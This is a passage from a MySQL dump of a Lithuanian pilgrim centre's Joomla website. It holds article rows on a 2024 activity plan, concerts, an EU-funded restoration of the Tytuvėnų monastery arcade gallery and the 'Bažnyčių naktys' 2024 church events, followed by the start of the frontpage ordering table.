00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"0\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,0,0,'','',1,1936,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(391,483,'Veiklos planas','veiklos-planas','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/apiecentra/veiklos_planas_2024.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/apiecentra/veiklos_planas_2024.pdf\" target=\"_self\">VšĮ Tytuvėnų piligrimų centro veiklos planas 2024 m.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,31,'2024-03-13 20:43:29',135,'','2024-03-13 20:57:56',135,135,'2024-03-13 20:57:56','2024-03-13 20:43:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,1,'','',1,1397,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(392,484,'Meilė klysta','meile-klysta','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Naujosios vokalinės muzikos kolektyvas \"MEILĖ KLYSTA\"</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2024 m. balandžio 3 d. 18 val.</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/meile_klysta/article.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2024-03-27 20:08:40',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2024-03-27 20:08:40','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/meile_klysta\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,3,'','',1,2051,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(393,485,'Projektas','projektas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong> <span><strong>Tytuvėnų piligrimų centras įveiklinimas ir aktualizavimas</strong></span><span> </span></strong></span></span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/eu/eu.png\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\">Projekto kodas06-006-K-0045.</p>\r\n<p style=\"text-align: justify;\">Projekto veiklų vykdymo pradžia  2023-04-04.</p>\r\n<p style=\"text-align: justify;\">Projekto veiklų vykdymo pabaiga 2026-03-31.</p>\r\n<p style=\"text-align: justify;\">Bendra projekto tinkamų finansuoti išlaidų suma 591 388,44 Eur.</p>\r\n<p style=\"text-align: justify;\">Europos Sąjungos lėšos 431 713, 56 Eur.</p>\r\n<p style=\"text-align: justify;\">Projekto tikslas – aktualizuoti kultūros paveldo objektą Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio arkadų galeriją ir pritaikyti šiuolaikiniams poreikiams ir kultūros paslaugų teikimui. Projektas išspręs identifikuotas problemas ir sudarys sąlygas papildomų kultūros renginių (koncertų, edukacijų – ekskursijų, paskaitų, parodų, festivalių) organizavimui objekte ir padidins kultūros paveldo objekto prieinamumą lankytojams.</p>\r\n<p style=\"text-align: justify;\">Pagrindinė problema – Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio – arkadų galerijos restauravimo būtinumas, ji nėra pritaikyta kultūrinėms reikmėms, o tai riboja kultūrinių paslaugų teikimą bei įtakoja objekto prieinamumą, populiarumą. Tytuvėnų Švč. Mergelės Marijos ir bernardinų vienuolyno ansamblio arkadų galerijoje išlikęs ardantis kapiliarinės drėgmės poveikis: stebimas drėgmės pakenktas tinkas ir mūras apatinėje sienų dalyje. Pažeista dalis skulptūrinių stacijų, stipriai pažeista sieninė tapyba, dėl kapiliarinės drėgmės poveikio. Būtinos stabilizuojančios priemonės, kad užkirsti kelią tolesniam šių vertingų meno kūrinių irimui. O tai riboja kultūrinių paslaugų teikimą bei įtakoja objekto prieinamumą, populiarumą, kultūros paveldo objekto potencialas kultūrinių paslaugų teikimui yra neišnaudojamas iki galo.</p>\r\n<p style=\"text-align: justify;\">Projekto pagrindinė veikla – Kultūros paveldo aktualizavimas ir įveiklinimas.</p>\r\n<p class=\"Text1\" style=\"text-align: justify;\">Projekto poveiklė – Kultūros paveldo objekto – Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio arkadų galerijos aktualizavimas ir įveiklinimas.</p>\r\n<p style=\"text-align: justify;\">Projekto metu bus atliekami Arkadų galerijos (u.k.21850) tvarkybos darbų projekto: restauravimo, konservavimo, remonto darbai I etapo darbai bei Arkadų galerijos paprasto remonto I etapo darbai.</p>\r\n<p style=\"text-align: justify;\">Laukiami rezultatai – restauruota Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio arkadų galerija,  užkirstas kelias tolesniam vertingų meno kūrinių irimui, sudarytos sąlygos ne tik išnaudoti objekto potencialą kultūros paslaugų teikimui, bet ir kovoti su sezoniškumu bei plėtoti ir kitas turizmo rūšis, tokias kaip žiemos turizmas, konferencinis turizmas, patirtinis turizmas, etc.</p>\r\n<p style=\"text-align: justify;\"><strong> </strong></p>',1,0,0,44,'2024-03-28 20:36:28',135,'','2024-04-04 09:01:42',135,0,'0000-00-00 00:00:00','2024-03-28 20:36:28','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/eu\\/eu.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,2,'','',1,1653,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(394,486,'Tytuvėnų piligrimų centras įveiklinimas ir aktualizavimas ','projektas','','<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong> </strong></span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/eu/eu.png\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\">Projekto kodas06-006-K-0045.</p>\r\n<p style=\"text-align: justify;\">Projekto veiklų vykdymo pradžia  2023-04-04.</p>\r\n<p style=\"text-align: justify;\">Projekto veiklų vykdymo pabaiga 2026-03-31.</p>\r\n<p style=\"text-align: justify;\">Bendra projekto tinkamų finansuoti išlaidų suma 591 388,44 Eur.</p>\r\n<p style=\"text-align: justify;\">Europos Sąjungos lėšos 431 713, 56 Eur.</p>\r\n<p style=\"text-align: justify;\">Projekto tikslas – aktualizuoti kultūros paveldo objektą Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio arkadų galeriją ir pritaikyti šiuolaikiniams poreikiams ir kultūros paslaugų teikimui. Projektas išspręs identifikuotas problemas ir sudarys sąlygas papildomų kultūros renginių (koncertų, edukacijų – ekskursijų, paskaitų, parodų, festivalių) organizavimui objekte ir padidins kultūros paveldo objekto prieinamumą lankytojams.</p>\r\n<p style=\"text-align: justify;\">Pagrindinė problema – Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio – arkadų galerijos restauravimo būtinumas, ji nėra pritaikyta kultūrinėms reikmėms, o tai riboja kultūrinių paslaugų teikimą bei įtakoja objekto prieinamumą, populiarumą. Tytuvėnų Švč. Mergelės Marijos ir bernardinų vienuolyno ansamblio arkadų galerijoje išlikęs ardantis kapiliarinės drėgmės poveikis: stebimas drėgmės pakenktas tinkas ir mūras apatinėje sienų dalyje. Pažeista dalis skulptūrinių stacijų, stipriai pažeista sieninė tapyba, dėl kapiliarinės drėgmės poveikio. Būtinos stabilizuojančios priemonės, kad užkirsti kelią tolesniam šių vertingų meno kūrinių irimui. O tai riboja kultūrinių paslaugų teikimą bei įtakoja objekto prieinamumą, populiarumą, kultūros paveldo objekto potencialas kultūrinių paslaugų teikimui yra neišnaudojamas iki galo.</p>\r\n<p style=\"text-align: justify;\">Projekto pagrindinė veikla – Kultūros paveldo aktualizavimas ir įveiklinimas.</p>\r\n<p class=\"Text1\" style=\"text-align: justify;\">Projekto poveiklė – Kultūros paveldo objekto – Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio arkadų galerijos aktualizavimas ir įveiklinimas.</p>\r\n<p style=\"text-align: justify;\">Projekto metu bus atliekami Arkadų galerijos (u.k.21850) tvarkybos darbų projekto: restauravimo, konservavimo, remonto darbai I etapo darbai bei Arkadų galerijos paprasto remonto I etapo darbai.</p>\r\n<p style=\"text-align: justify;\">Laukiami rezultatai – restauruota Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblio arkadų galerija,  užkirstas kelias tolesniam vertingų meno kūrinių irimui, sudarytos sąlygos ne tik išnaudoti objekto potencialą kultūros paslaugų teikimui, bet ir kovoti su sezoniškumu bei plėtoti ir kitas turizmo rūšis, tokias kaip žiemos turizmas, konferencinis turizmas, patirtinis turizmas, etc.</p>\r\n<p style=\"text-align: justify;\"><strong> </strong></p>',1,0,0,57,'2024-03-28 20:36:28',135,'','2024-04-04 09:02:02',135,0,'0000-00-00 00:00:00','2024-03-28 20:36:28','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/eu\\/eu.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,0,'','',1,319,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(395,487,'Bažnyčių naktys 2024','baznyciu-nakis-2024','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Bažnyčių naktys Kelmės rajone</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2024 07 18 - 07 21</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/baz2024/1.jpg\" border=\"0\" alt=\"\" /><img src=\"images/stories/naujienos/baz2024/2.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2024-07-01 19:24:33',135,'','2024-07-01 19:24:40',135,0,'0000-00-00 00:00:00','2024-07-01 19:24:33','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/baz2024\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,1,'','',1,1784,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(396,488,'Vykę \"Bažnyčių naktys\" renginiai','vyke-baznyciu-naktys-renginiai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> Kelmės rajone liepos 19-21 d. vyko \"Bažnyčių naktys\" renginiai</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Kelmės rajone \"Bažnyčių naktys\" renginiai prasidėjo liepos 19 d. penktadienį pažintine ekskursija Tytuvėnų mieste, kurios metu suteikta išskirtinė galimybė su vietine gide Rūta Krenciene patekti į Dievo Motinos ikonos \"Kazanskaja\" cerkvės, Kristaus Gelbėtojo koplyčios – mauzoliejaus bei naujai atrestauruotos šv. Juozapo kapinių koplyčios vidų. Vakare Tytuvėnų bažnyčioje laukė 2023 m. ir 2024 m. ypatingai didelio klausytojų dėmesio sulaukusi LRT rengiamoje Nacionalinės Eurovizijos atrankoje populiariosios klasikos grupės ,,IL Senso‘‘ koncertas. Po koncerto sulaukta begalės padėkų, už jaukų, šiltą ir kupiną gerų emocijų renginį.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Liepos 20 d. šeštadienį Tytuvėnų bernardinų vienuolyne atidaryta Nacionalinės M. K. Čiurlionio menų mokyklos buvusių dailės mokinių keramikos, tapybos, grafikos darbų paroda, kurių autoriai Nomeda Marčėnaitė, Marius Jonutis, Raimundas Kalesas ir kt. Specialiai šios  parodos atidarymui porceliano dirbiniai atkeliavo kartu su jos autore Nora Venciūte iš Jungtinių Amerikos Valstijų. Kiek vėliau laukė ekskursija  ,,XIX-XX a. Tytuvėnų miestas ir žmonės‘‘ su  tytuvėniškiu istoriku Robertu Mosėjumi. Šios dienos renginių ciklą vainikavo ,,GŠ ansamblis‘‘ Tytuvėnų šv. Juozapo kapinių koplyčioje. Vokalinis sakralinės  muzikos kolektyvas atliko senosios muzikos programą. Mažoje koplytėlė susirinkę dalyviai savo apmąstymuose su susikaupimu, kai kurie su ašaromis akyse, susimąstę klausėsi išskirtinų iki širdies gelmių keliaujančių giesmių.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>\"Bažnyčių naktys‘\" renginiai Kelmės rajone sekmadienį persikėlė į Kelmės miestą kur 11 val. Kelmės Švč. Mergelės Marijos Ėmimo į dangų bažnyčioje vyko Šv. Mišios, po Šv. Mišių visų laukė AJJU meno muziejus. Susipažinta su muziejaus įkūrėjais, išskirtine meno darbų kolekcija sukurta keturių šeimos narių. Išgirsta įdomių pasakojimų apie meilę, šeimą, gėrio ir blogio sandūrą. Beveik du šimtus penkiasdešimt metų skaičiuojančioje, įprastai tik per atlaidus veikiančioje, medinėje Šv. Onos bažnyčioje Verpenoje išgirdome \"KanCello\" muzikinę programą \"Baltas paukštis\".</span></span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Renginio organizatorius: VšĮ \"Tytuvėnų piligrimų centras\"</span></span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> </span></span></p>\r\n<p><strong><img src=\"images/stories/naujienos/bnaktys24/1.jpg\" border=\"0\" alt=\"\" /> <img src=\"images/stories/naujienos/bnaktys24/2.jpg\" border=\"0\" alt=\"\" /> <img src=\"images/stories/naujienos/bnaktys24/3.jpg\" border=\"0\" alt=\"\" /> <img src=\"images/stories/naujienos/bnaktys24/4.jpg\" border=\"0\" alt=\"\" /> <img src=\"images/stories/naujienos/bnaktys24/5.jpg\" border=\"0\" alt=\"\" /> </strong></p>',1,0,0,44,'2024-07-22 17:34:00',135,'','2024-07-22 17:51:05',135,0,'0000-00-00 00:00:00','2024-07-22 17:34:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/bnaktys24\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,0,'','',1,1401,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(397,489,'Planuojate įsigyti gidų paslaugas?','planuojate-isigyti-gidu-paslaugas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Ką verta žinoti?</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><strong style=\"font-size: 12.16px;\"><img src=\"images/stories/naujienos/gidu_paslaugos/gidu_paslaugos.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2024-07-28 18:13:18',135,'','2024-07-28 18:14:08',135,135,'2024-07-28 18:14:08','2024-07-28 18:13:18','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gidu_paslaugos\\/gidu_paslaugos_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,0,'','',1,1803,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','');
/*!40000 ALTER TABLE `xyhmu_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_content_frontpage`
--

DROP TABLE IF EXISTS `xyhmu_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_content_frontpage`
--

LOCK TABLES `xyhmu_content_frontpage` WRITE;
/*!40000 ALTER TABLE `xyhmu_content_frontpage` DISABLE KEYS */;
INSERT INTO `xyhmu_content_frontpage` VALUES (22,188),(15,189),(23,187),(24,186),(25,185),(26,184),(27,183),(193,177),(104,190),(105,191),(106,192),(107,193),(108,194),(109,195),(110,196),(192,178),(112,197),(113,198),(114,199),(115,200),(116,201),(117,202),(118,203),(119,204),(120,205),(121,206),(122,207),(123,208),(124,209),(125,210),(126,211),(127,212),(128,213),(129,214),(130,215),(131,216),(132,217),(133,218),(134,219),(135,220),(136,221),(137,179),(138,180),(139,181),(140,182),(204,176),(205,175),(207,174),(208,173),(209,172),(212,171),(213,170),(214,169),(215,168),(216,167),(217,166),(218,165),(219,164),(220,163),(221,162),(222,161),(223,160),(224,159),(225,158),(226,157),(227,156),(228,155),(229,154),(230,153),(231,152),(232,151),(233,150),(234,149),(235,148),(236,147),(237,146),(238,145),(239,144),(240,143),(242,142),(243,141),(244,140),(245,139),(246,138),(247,137),(248,136),(249,135),(250,134),(251,133),(252,132),(253,131),(256,130),(257,129),(258,128),(260,127),(261,126),(262,125),(263,124),(264,123),(265,122),(266,121),(267,120),(268,119),(269,118),(270,